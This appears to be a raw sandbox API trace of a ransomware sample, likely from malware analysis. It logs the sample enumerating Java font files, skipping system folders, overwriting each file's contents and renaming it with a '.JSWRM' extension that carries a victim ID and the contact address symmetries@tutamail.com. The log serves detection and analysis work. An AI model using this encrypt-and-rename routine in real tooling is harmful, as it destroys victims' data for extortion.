[0070.447] lstrcmpiW (lpString1="LucidaBrightRegular.ttf", lpString2="...") returned 1 [0070.447] lstrcmpiW (lpString1="LucidaBrightRegular.ttf", lpString2="windows") returned -1 [0070.447] lstrcmpiW (lpString1="LucidaBrightRegular.ttf", lpString2="recovery") returned -1 [0070.447] lstrcmpiW (lpString1="LucidaBrightRegular.ttf", lpString2="perflogs") returned -1 [0070.447] lstrcmpiW (lpString1="LucidaBrightRegular.ttf", lpString2="documents and settings") returned 1 [0070.447] lstrcmpiW (lpString1="LucidaBrightRegular.ttf", lpString2="$RECYCLE.BIN") returned 1 [0070.447] lstrcmpiW (lpString1="LucidaBrightRegular.ttf", lpString2="system volume information") returned -1 [0070.447] lstrcmpiW (lpString1="LucidaBrightRegular.ttf", lpString2="msocache") returned -1 [0070.447] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0070.447] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LucidaBrightRegular.ttf", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0070.447] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0070.447] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LucidaBrightRegular.ttf", cchWideChar=23, lpMultiByteStr=0x241100, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LucidaBrightRegular.ttf", lpUsedDefaultChar=0x0) returned 23 [0070.447] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0070.447] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0070.447] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LucidaBrightRegular.ttf", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0070.447] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0070.447] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LucidaBrightRegular.ttf", cchWideChar=23, lpMultiByteStr=0x241268, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LucidaBrightRegular.ttf", lpUsedDefaultChar=0x0) returned 23 [0070.447] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0070.447] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0070.447] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0070.447] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0070.447] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0070.447] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0070.448] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaBrightRegular.ttf" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\fonts\\lucidabrightregular.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x458 [0070.448] GetFileSizeEx (in: hFile=0x458, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=344908) returned 1 [0070.448] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0070.448] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24e1e0 [0070.449] ReadFile (in: hFile=0x458, lpBuffer=0x24e1e0, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1e0*, lpNumberOfBytesRead=0x345e89c*=0x27100, lpOverlapped=0x0) returned 1 [0070.461] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0070.461] WriteFile (in: hFile=0x458, lpBuffer=0x24e1e0*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24e1e0*, lpNumberOfBytesWritten=0x345e898*=0x27100, lpOverlapped=0x0) returned 1 [0070.461] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1e0 | out: hHeap=0x1e0000) returned 1 [0070.462] CloseHandle (hObject=0x458) returned 1 [0070.462] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0070.462] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0070.462] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0070.462] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0070.462] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0070.462] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0070.462] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0070.462] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3c0 [0070.462] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3c0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0070.462] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3c0 | out: hHeap=0x1e0000) returned 1 [0070.462] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d098 [0070.462] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2474b8 [0070.462] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d098 | out: hHeap=0x1e0000) returned 1 [0070.462] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0070.462] MoveFileW (lpExistingFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaBrightRegular.ttf" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\fonts\\lucidabrightregular.ttf"), lpNewFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaBrightRegular.ttf.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\fonts\\lucidabrightregular.ttf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0070.462] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2474b8 | out: hHeap=0x1e0000) returned 1 [0070.462] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0070.462] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0070.462] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0070.462] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0070.463] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c2a9b3, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c2a9b3, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c2a9b3, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x4d9c8, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="LucidaSansDemiBold.ttf", cAlternateFileName="LU38C7~1.TTF")) returned 1 [0070.463] lstrcmpiW (lpString1="LucidaSansDemiBold.ttf", lpString2=".") returned 1 [0070.463] lstrcmpiW (lpString1="LucidaSansDemiBold.ttf", lpString2="..") returned 1 [0070.463] lstrcmpiW (lpString1="LucidaSansDemiBold.ttf", lpString2="...") returned 1 [0070.463] lstrcmpiW (lpString1="LucidaSansDemiBold.ttf", lpString2="windows") returned -1 [0070.463] lstrcmpiW (lpString1="LucidaSansDemiBold.ttf", lpString2="recovery") returned -1 [0070.463] lstrcmpiW (lpString1="LucidaSansDemiBold.ttf", lpString2="perflogs") returned -1 [0070.463] lstrcmpiW (lpString1="LucidaSansDemiBold.ttf", lpString2="documents and settings") returned 1 [0070.463] lstrcmpiW (lpString1="LucidaSansDemiBold.ttf", lpString2="$RECYCLE.BIN") returned 1 [0070.463] lstrcmpiW (lpString1="LucidaSansDemiBold.ttf", lpString2="system volume information") returned -1 [0070.463] lstrcmpiW (lpString1="LucidaSansDemiBold.ttf", lpString2="msocache") returned -1 [0070.463] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0070.463] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LucidaSansDemiBold.ttf", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0070.463] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0070.463] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LucidaSansDemiBold.ttf", cchWideChar=22, lpMultiByteStr=0x241308, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LucidaSansDemiBold.ttf", lpUsedDefaultChar=0x0) returned 22 [0070.463] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0070.463] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0070.463] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LucidaSansDemiBold.ttf", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0070.463] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411f0 [0070.463] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LucidaSansDemiBold.ttf", cchWideChar=22, lpMultiByteStr=0x2411f0, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LucidaSansDemiBold.ttf", lpUsedDefaultChar=0x0) returned 22 [0070.463] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0070.463] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0070.463] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0070.463] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0070.463] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0070.463] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0070.463] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaSansDemiBold.ttf" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\fonts\\lucidasansdemibold.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x458 [0070.463] GetFileSizeEx (in: hFile=0x458, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=317896) returned 1 [0070.463] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0070.464] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24e1e0 [0070.464] ReadFile (in: hFile=0x458, lpBuffer=0x24e1e0, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1e0*, lpNumberOfBytesRead=0x345e89c*=0x27100, lpOverlapped=0x0) returned 1 [0070.478] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0070.478] WriteFile (in: hFile=0x458, lpBuffer=0x24e1e0*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24e1e0*, lpNumberOfBytesWritten=0x345e898*=0x27100, lpOverlapped=0x0) returned 1 [0070.479] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1e0 | out: hHeap=0x1e0000) returned 1 [0070.479] CloseHandle (hObject=0x458) returned 1 [0070.479] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0070.479] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0070.479] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0070.479] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0070.479] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0070.479] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0070.479] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0070.479] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a4b0 [0070.479] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a4b0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0070.479] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a4b0 | out: hHeap=0x1e0000) returned 1 [0070.479] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cdf8 [0070.479] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2476a8 [0070.479] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cdf8 | out: hHeap=0x1e0000) returned 1 [0070.479] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0070.479] MoveFileW (lpExistingFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaSansDemiBold.ttf" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\fonts\\lucidasansdemibold.ttf"), lpNewFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaSansDemiBold.ttf.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\fonts\\lucidasansdemibold.ttf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0070.480] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2476a8 | out: hHeap=0x1e0000) returned 1 [0070.480] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0070.480] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0070.480] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411f0 | out: hHeap=0x1e0000) returned 1 [0070.480] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0070.480] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c2a9b3, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c2a9b3, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c2a9b3, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0xaa77c, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="LucidaSansRegular.ttf", cAlternateFileName="LU761B~1.TTF")) returned 1 [0070.480] lstrcmpiW (lpString1="LucidaSansRegular.ttf", lpString2=".") returned 1 [0070.480] lstrcmpiW (lpString1="LucidaSansRegular.ttf", lpString2="..") returned 1 [0070.480] lstrcmpiW (lpString1="LucidaSansRegular.ttf", lpString2="...") returned 1 [0070.480] lstrcmpiW (lpString1="LucidaSansRegular.ttf", lpString2="windows") returned -1 [0070.480] lstrcmpiW (lpString1="LucidaSansRegular.ttf", lpString2="recovery") returned -1 [0070.480] lstrcmpiW (lpString1="LucidaSansRegular.ttf", lpString2="perflogs") returned -1 [0070.480] lstrcmpiW (lpString1="LucidaSansRegular.ttf", lpString2="documents and settings") returned 1 [0070.480] lstrcmpiW (lpString1="LucidaSansRegular.ttf", lpString2="$RECYCLE.BIN") returned 1 [0070.480] lstrcmpiW (lpString1="LucidaSansRegular.ttf", lpString2="system volume information") returned -1 [0070.480] lstrcmpiW (lpString1="LucidaSansRegular.ttf", lpString2="msocache") returned -1 [0070.480] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0070.480] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LucidaSansRegular.ttf", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0070.480] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0070.480] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LucidaSansRegular.ttf", cchWideChar=21, lpMultiByteStr=0x240fc0, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LucidaSansRegular.ttf", lpUsedDefaultChar=0x0) returned 21 [0070.480] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0070.480] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0070.481] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LucidaSansRegular.ttf", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0070.481] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0070.481] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LucidaSansRegular.ttf", cchWideChar=21, lpMultiByteStr=0x2411c8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LucidaSansRegular.ttf", lpUsedDefaultChar=0x0) returned 21 [0070.481] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0070.481] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0070.481] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0070.481] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0070.481] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0070.481] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0070.481] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaSansRegular.ttf" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\fonts\\lucidasansregular.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x458 [0070.481] GetFileSizeEx (in: hFile=0x458, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=698236) returned 1 [0070.481] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0070.481] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24e1e0 [0070.481] ReadFile (in: hFile=0x458, lpBuffer=0x24e1e0, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1e0*, lpNumberOfBytesRead=0x345e89c*=0x27100, lpOverlapped=0x0) returned 1 [0070.514] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0070.515] WriteFile (in: hFile=0x458, lpBuffer=0x24e1e0*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24e1e0*, lpNumberOfBytesWritten=0x345e898*=0x27100, lpOverlapped=0x0) returned 1 [0070.515] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1e0 | out: hHeap=0x1e0000) returned 1 [0070.515] CloseHandle (hObject=0x458) returned 1 [0070.515] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0070.515] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0070.515] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0070.515] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0070.515] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0070.515] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0070.515] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0070.515] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3f0 [0070.515] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3f0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0070.515] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3f0 | out: hHeap=0x1e0000) returned 1 [0070.516] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x1f10b0 [0070.516] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0070.516] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f10b0 | out: hHeap=0x1e0000) returned 1 [0070.516] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x140) returned 0x1ff448 [0070.516] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0070.516] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0070.516] MoveFileW (lpExistingFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaSansRegular.ttf" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\fonts\\lucidasansregular.ttf"), lpNewFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaSansRegular.ttf.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\fonts\\lucidasansregular.ttf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0070.517] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1ff448 | out: hHeap=0x1e0000) returned 1 [0070.517] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0070.517] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0070.517] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0070.517] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0070.517] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c2a9b3, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c2a9b3, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c2a9b3, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x39254, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="LucidaTypewriterBold.ttf", cAlternateFileName="LUE73B~1.TTF")) returned 1 [0070.517] lstrcmpiW (lpString1="LucidaTypewriterBold.ttf", 